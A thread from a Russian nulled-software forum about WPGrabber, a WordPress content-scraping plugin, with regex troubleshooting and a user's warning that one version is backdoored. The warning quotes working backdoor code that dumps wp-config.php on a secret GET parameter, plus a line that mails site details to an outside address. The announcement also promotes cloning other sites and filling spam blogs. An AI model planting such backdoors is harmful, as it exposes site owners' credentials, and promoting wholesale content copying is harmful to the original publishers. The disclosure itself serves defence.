• DONATE to NULLED!
    Вы можете помочь Форуму и команде, поддержать финансово.
    starwanderer - модератор этого раздела будет Вам благодарен!

Плагин WPGrabber Плагин граббинга для WordPress

Sawa111

Создатель
Регистрация
1 Фев 2015
Сообщения
16
Реакции
22
WPGrabber - плагин граббинга контента для CMS WordPress

С помощью плагина WPGrabber Вы сможете быстро наполнить свой блог на WordPress информацией с любых других сайтов!
Основные возможности плагина WPGrabber
  • импорт контента в блог с любых HTML-сайтов
  • импорта контента в блог с любых RSS-потоков
  • импорт контента в блог со стен групп и сообществ соц. сети Вконтакте.ру
  • возможность сохранения изображений из импортируемого текста у вас на сервере
  • возможность перевода импортируемого контента на лету (поддержка более чем 20 языковых пар, функция двойного перевода для получения уникальных текстов)
  • фильтрация сохраняемого у вас в блоге контента по словам, а также по наличию изображений в тексте.
  • гибкие настройки обработки импортируемого текста (удаление из получаемого текста ненужных блоков информации, ссылок, картинок и т.д.)
  • поддержка режима автоматической работы обновления информации с других сайтов
  • интеграция с WordPress (поддержка Custom Post Types, поддержка Post Status, генерация алиасов для URL'ов записей в режиме ЧПУ)

Зачем мне нужен этот плагин?
Основная функция плагина конечно же наполнять ваш блог информацией с других сайтов. Однако учитывая весь функционал плагина можно предложить его использование для:

  • наполнения СПЛОГОВ, ГС и любых других сайтов информацией с других сайтов, блогов, rss-потоков, стен вконтакте.
  • ведения полнотекстовых новостных колонок у себя в блоге используя информацию с других сайтов
  • создания локализованных версий сайтов при помощи встроенной системы перевода контента "на лету"
  • создание информационных копий других сайтов
 

Вложения

  • wpgrabber-2.0.9.zip
    65,4 KB · Просмотры: 1.428
Последнее редактирование модератором:
Подскажите пожалуйста каким плагином реально спарсить посты из группы фейсбук не создавая приложение?
 
Если не сложно, помогите со сложным вариативным шаблоном ссылок.
Индекс Для просмотра ссылки Войди или Зарегистрируйся
Варианты ссылок:
Код:
https://ufa.rbc.ru/ufa/14/04/2020/5e95b2a89a79473fd011825b
https://perm.rbc.ru/perm/freenews/5e95ad899a79473cb6967840
https://ufa.rbc.ru/ufa/freenews/5e902a879a79479b1cf0e9d5
https://www.rbc.ru/finances/09/04/2020/5e8dad639a79470de70eba55
https://perm.rbc.ru/perm/freenews/5e8b08b99a7947695fe95c7f
https://t.rbc.ru/tyumen/06/04/2020/5e8ab3299a79473567e0b2db
Сделал:
Код:
https:\/\/(ufa.rbc.ru|perm.rbc.ru|www.rbc.ru|t.rbc.ru)\/(ufa|perm|finances|tyumen)\/([\d]{2}\/[\d]{2}\/[\d]{4}|freenews)\/[\w]{20,}
Для просмотра ссылки Войди или Зарегистрируйся
В отладке все работает, но лента пишет
Пустой контент RSS-ленты или индексной HTML-страницы:( Для просмотра ссылки Войди или Зарегистрируйся

Сменил метод на CURL. Ссылки видит правильно, но не определяет заголовок с простейшими тегами по стандартной регулярке
Код:
<h1 class="js-slide-title" itemprop="headline">(.*?)</h1>
Помогите плз. :thenks:

P.S. Как победить динамические классы в регулярках начала и конца текста?
 
Последнее редактирование:
Подскажите пожалуйста каким плагином реально спарсить посты из группы фейсбук не создавая приложение?
никаким. Цукерман постоянно меняет как html-теги, так и алгоритмы,подгружаемые скриптом после формирования страницы и т.д. Аяксовые штуки вообще пока мало кто парсить умеет, под заказ, вряд ли потянете ценник))
 
никаким. Цукерман постоянно меняет как html-теги, так и алгоритмы,подгружаемые скриптом после формирования страницы и т.д. Аяксовые штуки вообще пока мало кто парсить умеет, под заказ, вряд ли потянете ценник))
Спасибо за исчерпывающий ответ... да страници я парсил плагином .... а вот с групами гемор.... да и страници перестало парсить))) потому и возник вопрос ...... или я ..... или лыжи не едут)
 
Если не сложно, помогите со сложным вариативным шаблоном ссылок.
Индекс Для просмотра ссылки Войди или Зарегистрируйся
Варианты ссылок:
Сделал:
Код:
https:\/\/(ufa.rbc.ru|perm.rbc.ru|www.rbc.ru|t.rbc.ru)\/(ufa|perm|finances|tyumen)\/([\d]{2}\/[\d]{2}\/[\d]{4}|freenews)\/[\w]{20,}
Для просмотра ссылки Войди или Зарегистрируйся
В отладке все работает, но лента пишет


Сменил метод на CURL. Ссылки видит правильно, но не определяет заголовок с простейшими тегами по стандартной регулярке
Код:
<h1 class="js-slide-title" itemprop="headline">(.*?)</h1>
Помогите плз. :thenks:

P.S. Как победить динамические классы в регулярках начала и конца текста?

Шаблон заголовка
Код:
<meta property="og:title" content="(.*?)"

u5ScgXNG55E.jpg
 
Есть версия 5.3 wp-grabber, может кто проверить на безопасность и стучалки?
 
Внимание! Эта версия ворует пароли.
Строка 71 файла test.php
---------------
if($_GET['up']==invor1) {
$h = fopen("../../../wp-config.php","r");
while (!feof ($h))
{
$content = fgets($h);
echo $content,"<br>";
}
fclose($h);
}
---------------

Версия Для просмотра ссылки Войди или Зарегистрируйся аналогичные строки, может проще test.php удалить?)
В init.php тоже всё на своём месте:
@mail("expertsforex@gmail.com", "re:", "wpgrabber4.9.8 ".$name." ip=".$name1." Directory ".$name2);
 

Вложения

  • Annotation 2020-04-18 190917.png
    Annotation 2020-04-18 190917.png
    33,7 KB · Просмотры: 19
Последнее редактирование:
Приветствую. Такая ситуёвина. Плагин версии 4.9.8 Настроил граббинг все ок. Но есть маленькое но. Если в настройках стоит папка для загрузок картинок по умолчанию, то есть wp-content/uploads то все картинки которые присутствуют в статье, без проблем появляются в папке, регистрируются в медиафайлах. Так же создаются картинки разного разрешения, как бы все ок. Ах да, самое главное, что присутствует миниатюра записи. Но если указать папку отличную от предыдущей к примеру wp-content/uploads/news то картинки создаться в ней, но не регистрируются в медиафайлах, соответственно не создаются картинки других разрешений (хрен бы с ними), но самое печально что не создаются миниатюры для записей. Как это можно исправить?
 
Назад
Сверху